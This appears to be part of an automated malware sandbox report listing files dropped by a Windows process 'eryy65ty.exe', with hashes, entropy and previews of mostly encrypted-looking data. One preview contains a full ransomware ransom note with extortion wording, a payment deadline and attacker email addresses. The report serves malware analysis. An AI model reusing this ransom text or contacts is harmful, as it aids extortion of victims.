                                                                                                                                              SSDEEP:24:xX1nfS8Z1JjvGV+PzQGacS5wgNO8jAbde8Iiqg4uIl+ow8tJAZZnpuJ3N4m/2:Xa8ZqpjpA8kbdrIiqg4RL3tJeZnpulF2
                                                                                                                                              MD5:68BB8E259F32186DEE21FC8C06850F86
                                                                                                                                              SHA1:44700076FF5760779948C26DCC93580341E9B617
                                                                                                                                              SHA-256:D8AEF07FC4BEA22148081593D122F8F19AC86F6F6FD10251082B722BC996973C
                                                                                                                                              SHA-512:94A2DB2D024F38872BCF7C5A6152532F895E0B25E28506CB366B7B90FF3ABD81F7930601A491A17C3CC1FDE3445730435F1355754A259CAA395FAAB7E88FD8F0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..S...T..t.W..J0yE...c...d....P-..fs..Ly....._.l.*[.....D.GG.wb...Y...2.....|Z).>.)...H.((z(.\\.V^Z.D...a.....ZpLx.7c.?.:...SO.7.\..oe...]....X....%T....k.ROsP.X.f_...q..&...<.q.Q.y]a.T.bn(X.6G...:.....5Y@...8..%..V.W#.0x...V.H.]....B.(.I..Z.U...X.`x.:_..|...s..83|.|..rF|:).;.z...P..=..fM........h...GJ~..[0.]f.M..&.%........:C....I.r]Q.=..L1.Vh..].....UV..j]D.(.Whd.h..a.y...V.W..Oo=..@.....v....A_.Uh.%. ....i.f8...A..:ph.SEL.v..gd2....W....N#.i..q..n.tc..$7.....dJ.o.\x.}.....j.F.Q.&...L .37"......]F..3..BW0J..|..s.+../H~./.5.sN...9.S...h*..z....*#.G..7.....V.N.2.y...p.""./..5u.....d;.F..~D.H.v..jN~W..Q..r..w.!#...SU..V9,.R.S.s;.WG..^M..Q../..M..).....QZ.\...&$....5!4`.':..bcHTM.O...p...G`.j.rr.\.....f.O.5......Bz.9T..x..0.L}m.*...QV...XU...D'.....JQ(.t.(7<.qK?..u.k...`..M1=....1..Ev..9../.Fi....r..^.`%.g.1*(c..B.....)l\.W...U@.p...P...7.q..A+..l.,....o....J.|j..=...y.>^?..?..L.&....WAL..s..m....m2..l..4+..Q.4G6n.f.q...mm=..Q..>._(6k...%.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.826900689536974
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:7mlPAt2+qICDfHqoCQnQjVopoWng6WfC6eSsJGXId/+Y0yJxijn/w:7mit7CDfHKDoGWznZEId2Yqr/w
                                                                                                                                              MD5:B3363D98F16EFC9A083C232E584ABBD2
                                                                                                                                              SHA1:10C159BF033D12D697AFFF9111DB3523E41D9BA9
                                                                                                                                              SHA-256:E2ADF9244CF25A272CA3445FC37F6BD5D6E7A0647AE6F9DEE98074ECCD6171DF
                                                                                                                                              SHA-512:420EE275DE27C6EB9EF001AB8424721D0CFE896236D883CB8D6D86E7C8E37F0680949F83DB304DAB074550A16E2B71D93CFF8FDF5E70FC84339AF313F7CA1893
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...tV.#m..~....'........{H..t....`[...w.......T6.d"........LT&..+I\....AM.........X.|...4.x........i.n....M.tj?.0..4...}X.~.(5.-.P.8.......N".~....-Wj.-.n...."..J......XZ. N..8m/....f....ul..b.wZ....u..T...A...Rg@.EV...<T.)pBW..;..o$.....6D...!..#.m.......n..X.^W.Ta..z...,,.\c.?.@1u.......(....)....).=.XL...z.[.Q ?...V.....UD.Z....Ae.......v..S..*.|.-._j.a={;a.K.u...Z.K....z...!q#.Z%....eo... ..p.&A...........4"M...x.H......-.p...(.rV[._Uy...g&..s.<......M..;..z%..vld....x..Z.......H|..C..[..9......g.~..`......=...u.2L........F..A>.mu..Mz1(........9..F(z.;.....^..E.)...L;)..;8.>..d.G...9.)?.ic&...t..p5.w).1..u...B.1.n.....!N.^.y.....uby..".T....w}.7.....v`=2c.N...i\....+i..^.w....*.s..@.N..O+<.Fq.<B......>.@^.:<WL.D.H.Vb.)p.....$=..-.r..o...........FQ&."._A.......i...=..i? {TdS_....oD.>.^.]:T.#...Y...T;.L.....}_.....).u..o4..3....B..O:6.(8>L.0...Q...V..K.B%o<D...Y...(.pk.V..\.w....b.....p!.....Lw.....o...p(v&@.g'q..T)i.o.K.....?..kE......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.826900689536974
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:7mlPAt2+qICDfHqoCQnQjVopoWng6WfC6eSsJGXId/+Y0yJxijn/w:7mit7CDfHKDoGWznZEId2Yqr/w
                                                                                                                                              MD5:B3363D98F16EFC9A083C232E584ABBD2
                                                                                                                                              SHA1:10C159BF033D12D697AFFF9111DB3523E41D9BA9
                                                                                                                                              SHA-256:E2ADF9244CF25A272CA3445FC37F6BD5D6E7A0647AE6F9DEE98074ECCD6171DF
                                                                                                                                              SHA-512:420EE275DE27C6EB9EF001AB8424721D0CFE896236D883CB8D6D86E7C8E37F0680949F83DB304DAB074550A16E2B71D93CFF8FDF5E70FC84339AF313F7CA1893
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...tV.#m..~....'........{H..t....`[...w.......T6.d"........LT&..+I\....AM.........X.|...4.x........i.n....M.tj?.0..4...}X.~.(5.-.P.8.......N".~....-Wj.-.n...."..J......XZ. N..8m/....f....ul..b.wZ....u..T...A...Rg@.EV...<T.)pBW..;..o$.....6D...!..#.m.......n..X.^W.Ta..z...,,.\c.?.@1u.......(....)....).=.XL...z.[.Q ?...V.....UD.Z....Ae.......v..S..*.|.-._j.a={;a.K.u...Z.K....z...!q#.Z%....eo... ..p.&A...........4"M...x.H......-.p...(.rV[._Uy...g&..s.<......M..;..z%..vld....x..Z.......H|..C..[..9......g.~..`......=...u.2L........F..A>.mu..Mz1(........9..F(z.;.....^..E.)...L;)..;8.>..d.G...9.)?.ic&...t..p5.w).1..u...B.1.n.....!N.^.y.....uby..".T....w}.7.....v`=2c.N...i\....+i..^.w....*.s..@.N..O+<.Fq.<B......>.@^.:<WL.D.H.Vb.)p.....$=..-.r..o...........FQ&."._A.......i...=..i? {TdS_....oD.>.^.]:T.#...Y...T;.L.....}_.....).u..o4..3....B..O:6.(8>L.0...Q...V..K.B%o<D...Y...(.pk.V..\.w....b.....p!.....Lw.....o...p(v&@.g'q..T)i.o.K.....?..kE......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.841427555368823
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:kgwnczLL5a0hUaMt8hIN6egNNVI7cVJyYaudMmKrbIOMMNRtIkyd7jE9U/O4g0/V:ZRzLNaPaS8/egN71VJyYalmaMMNnI7l1
                                                                                                                                              MD5:C8C96D5F3A67A9F8149320F628BEB317
                                                                                                                                              SHA1:7ACA1F67BFFFC3AE0B56586C21E44024E54DDA6B
                                                                                                                                              SHA-256:70D106CE13232D09EF14A877ABF7EB1AABDE6A6022FBC03E8A1D84F0A034C757
                                                                                                                                              SHA-512:8A8911B419FC22B7044185AB90C1AD0EB305FDEB99E2047F1D10F512561F0E4DCE21762B7238309919A4EF369347541E75317DE6651A08592DB82D65B3ECD899
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.v.K."/.:..L..F.*e5..!..t.;....]+I..g..s....'V:..:!D2...#N.....,...\g......[......c...QMl..t|.5@.Nv.2r.z.71...@T.......V..K....Y.2.J..F^..xQ....Y...O..o...B..bY\...{.h..l|7.V.%a.k%k@.t.....@......P:..X...(6..M..ac.*R$.P.<.C..T...z.-#...{...;)...A...'S....Fe..a..1..t8].J..Dv.f.s.i.D..,)H_.6..:Wg.......w.?...t..EKzo..2t.......%T.....p.r.5....-..g..>L.|.5.Y.._.#.C..E'.;..sdi.*....e......1..n.=....r.iZ...x..xK.l~.g...wH.(...XX.....Ev$.L.0..Yy..p..W...F.L....`.|;t...[4S.....]......>*.....2W..9.>KB-.e2.+M..=.<.)..;.#....^...B.c..X..?.........!)..s..u._.D.j....t.....$s......d...$.....m.M.'.=........=....Y.#_-~5.....-n.....U...!......^...1.....sD....s.]...ki/C.f>.i.'.<.`.MOe2M..H.u8.!.,aj]`.4..B..*.?.UZ.w.e..^..o..C...]S....mq...sl......].....ga.K.....hK..c"..7....._..(.?..W=k..B......G2.Ic<..u.`@Z@...p....H..p.Z.....T..!.o.T...Z..&J.Q..i..A.wbi.U...$.5.qw6.0l.Q..v.yz.....<...6.:.. /....V`9v..`M..&{Z....Izb...}...*..wpV.<G..M.Gz..&..M.......G.1ulI
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.841427555368823
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:kgwnczLL5a0hUaMt8hIN6egNNVI7cVJyYaudMmKrbIOMMNRtIkyd7jE9U/O4g0/V:ZRzLNaPaS8/egN71VJyYalmaMMNnI7l1
                                                                                                                                              MD5:C8C96D5F3A67A9F8149320F628BEB317
                                                                                                                                              SHA1:7ACA1F67BFFFC3AE0B56586C21E44024E54DDA6B
                                                                                                                                              SHA-256:70D106CE13232D09EF14A877ABF7EB1AABDE6A6022FBC03E8A1D84F0A034C757
                                                                                                                                              SHA-512:8A8911B419FC22B7044185AB90C1AD0EB305FDEB99E2047F1D10F512561F0E4DCE21762B7238309919A4EF369347541E75317DE6651A08592DB82D65B3ECD899
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.v.K."/.:..L..F.*e5..!..t.;....]+I..g..s....'V:..:!D2...#N.....,...\g......[......c...QMl..t|.5@.Nv.2r.z.71...@T.......V..K....Y.2.J..F^..xQ....Y...O..o...B..bY\...{.h..l|7.V.%a.k%k@.t.....@......P:..X...(6..M..ac.*R$.P.<.C..T...z.-#...{...;)...A...'S....Fe..a..1..t8].J..Dv.f.s.i.D..,)H_.6..:Wg.......w.?...t..EKzo..2t.......%T.....p.r.5....-..g..>L.|.5.Y.._.#.C..E'.;..sdi.*....e......1..n.=....r.iZ...x..xK.l~.g...wH.(...XX.....Ev$.L.0..Yy..p..W...F.L....`.|;t...[4S.....]......>*.....2W..9.>KB-.e2.+M..=.<.)..;.#....^...B.c..X..?.........!)..s..u._.D.j....t.....$s......d...$.....m.M.'.=........=....Y.#_-~5.....-n.....U...!......^...1.....sD....s.]...ki/C.f>.i.'.<.`.MOe2M..H.u8.!.,aj]`.4..B..*.?.UZ.w.e..^..o..C...]S....mq...sl......].....ga.K.....hK..c"..7....._..(.?..W=k..B......G2.Ic<..u.`@Z@...p....H..p.Z.....T..!.o.T...Z..&J.Q..i..A.wbi.U...$.5.qw6.0l.Q..v.yz.....<...6.:.. /....V`9v..`M..&{Z....Izb...}...*..wpV.<G..M.Gz..&..M.......G.1ulI
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.850927801194213
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:zuTjHCkmg1kxlyuE5EQFOcN0lAyYb32hDEzaXhCGmtoNW9G9Fd:zuniqOy/LwZvDEzHGo6
                                                                                                                                              MD5:9A7122E3C2B53A69544C950074E1F3F8
                                                                                                                                              SHA1:8B532649945398BB6FACD7B65935B52FEE641D95
                                                                                                                                              SHA-256:2585D74F6A32182BA2C8502723DCB0D451B621C385252F58B95096C3502854C1
                                                                                                                                              SHA-512:89159598220AFB8DB3EEA5EF7BC6A5D2F62C6EC6FF1B83EEB7EC1FC2D4C6E7A1193E24207EB0352B82B1C3FD2BC0B257FA11640D500EC4D4CE32CB954E28284B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.=..o<.v.H..t...}B...AW..w...........!....i.'..u..ak.r.u8.ge.ag.l.@..N...UW..],.W:..D...3&w..t.....`-.S{4..g...a....&\....O.f...p......O.ub.#T8.....^......JW/......L.q..XFY.G......\7..f.H~.9...Q...._......aY...H../.2...vg.....6..M....&.f....~{6.Df6U.z:5.JG.......|.TL.%g.@[.3$T....h.......q...X.O.h.....q.e...'...d....".....(.t*...yX..F..]....:._......l..&...C.#..eaFS>..Tx\>&..........|./..-.R..y.S...M....*..?...H..D0.m.}...Ay.{..\T...x...Q..CDA:....5......B...7.......G........L..<._g>.....D.........mG.f.b"......[:r.R...szr_.C...(.w.u.@{7z........vt...Y|hBi..J}fd.9....4.[....6*..M....4...U.E.RC`..!-...x..K2."@.B..\.'..L.v....)....EGCP..(...3UW%.;..^.6.g.)...i...5....B.o.........C....vRR.%./l...Cwc...;z....>.g..SA......+..]..HV<B...&s...*.............5...Z.....K.sL=r?*...c.~..".S.9..n..).R.L.d...[+..p.O.r.jQ.,H\......>7......2.D.<..!.EH%..@_.p-..6.E.(.<..9:......'....wm!i'?.../.....\...A.^.f.......d....s......S.o9Z..O.....5`.N.......U^.".....i.O_.<..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.850927801194213
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:zuTjHCkmg1kxlyuE5EQFOcN0lAyYb32hDEzaXhCGmtoNW9G9Fd:zuniqOy/LwZvDEzHGo6
                                                                                                                                              MD5:9A7122E3C2B53A69544C950074E1F3F8
                                                                                                                                              SHA1:8B532649945398BB6FACD7B65935B52FEE641D95
                                                                                                                                              SHA-256:2585D74F6A32182BA2C8502723DCB0D451B621C385252F58B95096C3502854C1
                                                                                                                                              SHA-512:89159598220AFB8DB3EEA5EF7BC6A5D2F62C6EC6FF1B83EEB7EC1FC2D4C6E7A1193E24207EB0352B82B1C3FD2BC0B257FA11640D500EC4D4CE32CB954E28284B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.=..o<.v.H..t...}B...AW..w...........!....i.'..u..ak.r.u8.ge.ag.l.@..N...UW..],.W:..D...3&w..t.....`-.S{4..g...a....&\....O.f...p......O.ub.#T8.....^......JW/......L.q..XFY.G......\7..f.H~.9...Q...._......aY...H../.2...vg.....6..M....&.f....~{6.Df6U.z:5.JG.......|.TL.%g.@[.3$T....h.......q...X.O.h.....q.e...'...d....".....(.t*...yX..F..]....:._......l..&...C.#..eaFS>..Tx\>&..........|./..-.R..y.S...M....*..?...H..D0.m.}...Ay.{..\T...x...Q..CDA:....5......B...7.......G........L..<._g>.....D.........mG.f.b"......[:r.R...szr_.C...(.w.u.@{7z........vt...Y|hBi..J}fd.9....4.[....6*..M....4...U.E.RC`..!-...x..K2."@.B..\.'..L.v....)....EGCP..(...3UW%.;..^.6.g.)...i...5....B.o.........C....vRR.%./l...Cwc...;z....>.g..SA......+..]..HV<B...&s...*.............5...Z.....K.sL=r?*...c.~..".S.9..n..).R.L.d...[+..p.O.r.jQ.,H\......>7......2.D.<..!.EH%..@_.p-..6.E.(.<..9:......'....wm!i'?.../.....\...A.^.f.......d....s......S.o9Z..O.....5`.N.......U^.".....i.O_.<..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.829885991455546
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:AIgOuLWMdoT3+nFz7nWWrTjN8A1N3IijS9ZhdIBneNpkuJ:ADjoToFz7WcHK8N3jYZhqeNZ
                                                                                                                                              MD5:F5299E77C131B20AFDF6344B580A049D
                                                                                                                                              SHA1:C88847CE3B2921E92E9FA13E014E57C8A6EC0E10
                                                                                                                                              SHA-256:6B41D366C6055EF3D7A13A9385B6DD1C57E5E592DDAB22A546BDF08170F08EC5
                                                                                                                                              SHA-512:716FAC58AA686A4BB8BA32C62275C17D262C7FF71D8D4A074A59F9D1280E784998C52BCEBEC325BE59A12C21C595617778976CE66357B2F80A210BC8D55F5360
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.*.s../...p..h...]....-...x*.E..M..@........H.....B!...2{~...IXe...~F..5....i(...c;.^......;c.N]....Lf....'}...K....hl.......zR~.k...!....W...j.."...)h...?....#K0(E.._.*.L9"....JS..<....Hi..i$........!0]7k...j[K.3B?.M.;........R.^...M..+.^H....P3....8.m.....[..@\........Z.....x...~~.'W..<*B0Z.~.7ixo..<....a#*N......k.g.x(VQ.M.{..j....$r..........,......ng...o..=.......7!.......&.g{..!....l..NaC"t..........[..IBG^U!.%..\a...|N.Y;cw.Dd\.j...H.zx.}.lo.>.....j09.<...@eU..........r.O..;4}..\....O@.x.....*M3..7..3&qvR...~H$X.<.JZ...x.8t.....9......M......NOzs;.}X...mV~...-..2.{.......vM....W.8..S7.".....gH.Ey....<....]X...Q.t.q{.8..S.....B...F..h.x.....x.....0*.3E..:D._K=.2x;&..).LP.6.<......w...(........j.E..%. ..N..3|..0......7C..u...s..Kr.W.........?..m........&....9.Bt.........Mk.b.iF.A...1.$4.%.jQ...[74K.W........PL.B..../..bG..R.Hx.aA..C...m/..{.....[.n.......;..x..Yv...........&.<x..M..s..H.Q....C".?.[..E..7z2....h..N.>G..zG...?.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.829885991455546
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:AIgOuLWMdoT3+nFz7nWWrTjN8A1N3IijS9ZhdIBneNpkuJ:ADjoToFz7WcHK8N3jYZhqeNZ
                                                                                                                                              MD5:F5299E77C131B20AFDF6344B580A049D
                                                                                                                                              SHA1:C88847CE3B2921E92E9FA13E014E57C8A6EC0E10
                                                                                                                                              SHA-256:6B41D366C6055EF3D7A13A9385B6DD1C57E5E592DDAB22A546BDF08170F08EC5
                                                                                                                                              SHA-512:716FAC58AA686A4BB8BA32C62275C17D262C7FF71D8D4A074A59F9D1280E784998C52BCEBEC325BE59A12C21C595617778976CE66357B2F80A210BC8D55F5360
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.*.s../...p..h...]....-...x*.E..M..@........H.....B!...2{~...IXe...~F..5....i(...c;.^......;c.N]....Lf....'}...K....hl.......zR~.k...!....W...j.."...)h...?....#K0(E.._.*.L9"....JS..<....Hi..i$........!0]7k...j[K.3B?.M.;........R.^...M..+.^H....P3....8.m.....[..@\........Z.....x...~~.'W..<*B0Z.~.7ixo..<....a#*N......k.g.x(VQ.M.{..j....$r..........,......ng...o..=.......7!.......&.g{..!....l..NaC"t..........[..IBG^U!.%..\a...|N.Y;cw.Dd\.j...H.zx.}.lo.>.....j09.<...@eU..........r.O..;4}..\....O@.x.....*M3..7..3&qvR...~H$X.<.JZ...x.8t.....9......M......NOzs;.}X...mV~...-..2.{.......vM....W.8..S7.".....gH.Ey....<....]X...Q.t.q{.8..S.....B...F..h.x.....x.....0*.3E..:D._K=.2x;&..).LP.6.<......w...(........j.E..%. ..N..3|..0......7C..u...s..Kr.W.........?..m........&....9.Bt.........Mk.b.iF.A...1.$4.%.jQ...[74K.W........PL.B..../..bG..R.Hx.aA..C...m/..{.....[.n.......;..x..Yv...........&.<x..M..s..H.Q....C".?.[..E..7z2....h..N.>G..zG...?.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.847764628138133
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:4amjXv71uULIMDWjWlpjy/7lBCoJcEiDWGTu2FeUBmRrYRB6P74dAcv5m:8Dv1IMDWjWlpjGPqW+umBmR0B6P74r5m
                                                                                                                                              MD5:885EE2B0E97060710512A69C685D35BE
                                                                                                                                              SHA1:46A6AE36BAD0DAED8D348376456B2811A76FDCF8
                                                                                                                                              SHA-256:C4C2244F6157FF24B10D6AB9129686063A69EC054367A219A9FE77F7777F4B72
                                                                                                                                              SHA-512:FDECF95E1564AFA8DBC0724B1E2C4810CA2BF391C633569A67158040B7E537F3EDFE55FC04581A2E8CBB515A52F75FB95D19A7AB8B37F4222C8B9FB3E8B75DED
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..&..[...s,...=.x}.?....pR.2.*.]...G-I|.`..T..|...:....).....]o...xK.G...0./.a.>.'>.W....Ll.7.{....j/ $........%.`..._...._Jv..I..\`.}..T..Y..-e^...D8.`?T.L..mJ....~....<]z..7L..I..kX.".;..e..u.B..F.J.........z_\1........Y.".o.ux7<..B...gn.H5d.......4Q..x.3..1...K.A.YF.....].R..).y]..Y...Z.AKg..k..C.>A.........`..U.|Y.CW..D.....~H.;._...1......%NC.C.Y...,.zR....r./^~b..}.....?.[..{_...a.._.0..[R..4...{.t.4.kq.d...P)....M.......l._.u&#w..1......m......3!_H... ...,.|q..g.........4.Xo..J"D{.$y..y...h....._..B./.{-....D..[."....d....b..|[`Y*f..Ek..u.<[.kJ...._Ui....b&..2H.n.c.3....|...P.8...|E.A...@.w=...6#.&z.N...p.....v.m.^ ;...0.2..M....j.7".,...*...+....7.1t...I.q.(......+R.Ag...FGN..b.P."M..@.I..Y....~..e.O..r..(r..`&....z.":n.!g.6...O..C.>..>h.t.. ..z...J-...p....{...Y....."8.m..Y...$6.P.....?J.........=L.F...Z...XX..O.#."@..m..#..a.fI.&......M...e..d...6.^K.n.D9=.A..>...d]......~w.........x<A|.Ash.]...\y....i2.`9..8/.~.E..|.....0.N(d.aZ.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.847764628138133
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:4amjXv71uULIMDWjWlpjy/7lBCoJcEiDWGTu2FeUBmRrYRB6P74dAcv5m:8Dv1IMDWjWlpjGPqW+umBmR0B6P74r5m
                                                                                                                                              MD5:885EE2B0E97060710512A69C685D35BE
                                                                                                                                              SHA1:46A6AE36BAD0DAED8D348376456B2811A76FDCF8
                                                                                                                                              SHA-256:C4C2244F6157FF24B10D6AB9129686063A69EC054367A219A9FE77F7777F4B72
                                                                                                                                              SHA-512:FDECF95E1564AFA8DBC0724B1E2C4810CA2BF391C633569A67158040B7E537F3EDFE55FC04581A2E8CBB515A52F75FB95D19A7AB8B37F4222C8B9FB3E8B75DED
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..&..[...s,...=.x}.?....pR.2.*.]...G-I|.`..T..|...:....).....]o...xK.G...0./.a.>.'>.W....Ll.7.{....j/ $........%.`..._...._Jv..I..\`.}..T..Y..-e^...D8.`?T.L..mJ....~....<]z..7L..I..kX.".;..e..u.B..F.J.........z_\1........Y.".o.ux7<..B...gn.H5d.......4Q..x.3..1...K.A.YF.....].R..).y]..Y...Z.AKg..k..C.>A.........`..U.|Y.CW..D.....~H.;._...1......%NC.C.Y...,.zR....r./^~b..}.....?.[..{_...a.._.0..[R..4...{.t.4.kq.d...P)....M.......l._.u&#w..1......m......3!_H... ...,.|q..g.........4.Xo..J"D{.$y..y...h....._..B./.{-....D..[."....d....b..|[`Y*f..Ek..u.<[.kJ...._Ui....b&..2H.n.c.3....|...P.8...|E.A...@.w=...6#.&z.N...p.....v.m.^ ;...0.2..M....j.7".,...*...+....7.1t...I.q.(......+R.Ag...FGN..b.P."M..@.I..Y....~..e.O..r..(r..`&....z.":n.!g.6...O..C.>..>h.t.. ..z...J-...p....{...Y....."8.m..Y...$6.P.....?J.........=L.F...Z...XX..O.#."@..m..#..a.fI.&......M...e..d...6.^K.n.D9=.A..>...d]......~w.........x<A|.Ash.]...\y....i2.`9..8/.~.E..|.....0.N(d.aZ.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.875309882948775
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:kHARTwvK162R4mnOL5B4rCDNXa0Uq79hYvpu/my019s23toB3x8N/ooxOVgP:kHuMGt2fkBi9GvIm595i1+xooxgM
                                                                                                                                              MD5:EC9F818F1873C59FF14F1F760F829A3B
                                                                                                                                              SHA1:2640E4979241EF37B0BB6597226CBC18E46224BE
                                                                                                                                              SHA-256:A5B7B1EAEF251056AC1AE36F34E743CCD99510DDDF3CF3D5AB62B53CED8B7144
                                                                                                                                              SHA-512:1AFC8507D1EEECD870C2D1C7D59F8B224D3ABE8588987FD42DB0AABCDF2BDB68C48137FFEDBC127C3441FF7B240D3CBF4D4B7A1C6399252584F384504303D5F2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:....o.0*d-.GVIk.....t..].SDh{...J..S%E...P..hR.C..0L.m}V.\.....".....xy...~.....!...o)]._..b$.m..@(...,.......7..[.r/U...G./..*....%7....O..D.A......!....(.s..E...n.@n..'|.4....'S......}.1......c....x.....;....c?.#.....k.X..}.vZ..0.L.......Sr...0"Z..w:..Z.w.z...l]..........v...\q..\%.n..}?.|P^..U.F.?}ygHl.fZ.f.D.$D..Q....]..5m{.J..U....)~.gn..,(i.to..~.{.0....uZy.8y..`T..b.a.K.A....PK.d.......X..=..M.:.R...O'...u(.6.p[e...D...,.w..Ox.wIQr.,.+.....-*.\.4O..:...- ..~F.`.5.HM.....b;.I2<..$q.....W.^.;.<..c."...H.1jf(...t.'"..F+x.m=..l..'Q{...p..3.......`\.%}S....!L....}.......{..ve.o>Ys./...n.(...b....qFn...1/...w..N..(...B`%.;..1l.tL........,.~.b.Nr}./.?....No.kP0..2..X..U/}G..Ab.gGX-YnF....f...;;......xF..A.f...b.).e......8.......9.._..c9..B;..p.%e..K..\:..AD.Wh...I.;:{L..~......v..7...Z......[z[.Q_....a...}w.#.d.,.=....g....0......#.....8;..b...O..V/...c*.|W..#-.tY.)...j.cYs.27.pD....J....UT..O>T....W....#..)%....vL...C.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.875309882948775
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:kHARTwvK162R4mnOL5B4rCDNXa0Uq79hYvpu/my019s23toB3x8N/ooxOVgP:kHuMGt2fkBi9GvIm595i1+xooxgM
                                                                                                                                              MD5:EC9F818F1873C59FF14F1F760F829A3B
                                                                                                                                              SHA1:2640E4979241EF37B0BB6597226CBC18E46224BE
                                                                                                                                              SHA-256:A5B7B1EAEF251056AC1AE36F34E743CCD99510DDDF3CF3D5AB62B53CED8B7144
                                                                                                                                              SHA-512:1AFC8507D1EEECD870C2D1C7D59F8B224D3ABE8588987FD42DB0AABCDF2BDB68C48137FFEDBC127C3441FF7B240D3CBF4D4B7A1C6399252584F384504303D5F2
                                                                                                                                              Malicious:false
